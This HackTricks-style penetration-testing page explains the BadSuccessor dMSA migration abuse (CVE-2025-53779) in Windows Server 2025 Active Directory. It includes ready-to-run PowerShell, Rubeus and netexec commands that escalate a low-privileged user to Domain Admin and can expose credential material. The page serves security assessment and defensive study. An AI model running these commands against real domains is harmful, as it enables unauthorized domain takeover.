BadSuccessor
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Browse the full HackTricks Training catalog for the assessment tracks (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group, the telegram group, follow @hacktricks_live on X/Twitter, or check the LinkedIn page and YouTube channel.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
BadSuccessor abuses the delegated Managed Service Account (dMSA) migration workflow introduced in Windows Server 2025. A dMSA can be linked to a legacy account through msDS-ManagedAccountPrecededByLink and moved through the migration states stored in msDS-DelegatedMSAState. If an attacker can create a dMSA in a writable OU and control those attributes, the KDC can issue tickets for the attacker-controlled dMSA with the authorization context of the linked account.
In practice this means a low-privileged user who only has delegated OU rights can create a new dMSA, point it at Administrator, complete the migration state, and then obtain a TGT whose PAC contains privileged groups such as Domain Admins.
dMSA migration details that matter
- dMSA is a Windows Server 2025 feature.
Start-ADServiceAccountMigrationsets the migration into the started state.Complete-ADServiceAccountMigrationsets the migration into the completed state.msDS-DelegatedMSAState = 1means migration started.msDS-DelegatedMSAState = 2means migration completed.- During legitimate migration, the dMSA is meant to replace the superseded account transparently, so the KDC/LSA preserve access that the previous account already had.
Microsoft Learn also notes that during migration the original account is tied to the dMSA and the dMSA is intended to access what the old account could access. This is the security assumption BadSuccessor abuses.
Requirements
- A domain where dMSA exists, which means Windows Server 2025 support is present on the AD side.
- The attacker can create
msDS-DelegatedManagedServiceAccountobjects in some OU, or has equivalent broad child-object creation rights there. - The attacker can write the relevant dMSA attributes or fully control the dMSA they just created.
- The attacker can request Kerberos tickets from a domain-joined context or from a tunnel that reaches LDAP/Kerberos.
Practical checks
The cleanest operator signal is to verify the domain/forest level and confirm the environment is already using the new Server 2025 stack:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
If you see values such as Windows2025Domain and Windows2025Forest, treat BadSuccessor / dMSA migration abuse as a priority check.
You can also enumerate writable OUs delegated for dMSA creation with public tooling:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Abuse flow
- Create a dMSA in an OU where you have delegated create-child rights.
- Set
msDS-ManagedAccountPrecededByLinkto the DN of a privileged target such asCN=Administrator,CN=Users,DC=corp,DC=local. - Set
msDS-DelegatedMSAStateto2to mark the migration as completed. - Request a TGT for the new dMSA and use the returned ticket to access privileged services.
PowerShell example:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Ticket request / operational tooling examples:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Why this is more than privilege escalation
During legitimate migration, Windows also needs the new dMSA to handle tickets that were issued for the previous account before cutover. This is why dMSA-related ticket material can include current and previous keys in the KERB-DMSA-KEY-PACKAGE flow.
For an attacker-controlled fake migration, that behavior can turn BadSuccessor into:
- Privilege escalation by inheriting privileged group SIDs in the PAC.
- Credential material exposure because previous-key handling can expose material equivalent to the predecessor’s RC4/NT hash in vulnerable workflows.
That makes the technique useful both for direct domain takeover and for follow-on operations such as pass-the-hash or wider credential compromise.
Notes on patch status
The original BadSuccessor behavior is not just a theoretical 2025 preview issue. Microsoft assigned it CVE-2025-53779 and published a security update in August 2025. Keep this attack documented for:
- labs / CTFs / assume-breach exercises
- unpatched Windows Server 2025 environments
- validation of OU delegations and dMSA exposure during assessments
Do not assume a Windows Server 2025 domain is vulnerable just because dMSA exists; verify patch level and test carefully.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Browse the full HackTricks Training catalog for the assessment tracks (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group, the telegram group, follow @hacktricks_live on X/Twitter, or check the LinkedIn page and YouTube channel.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.


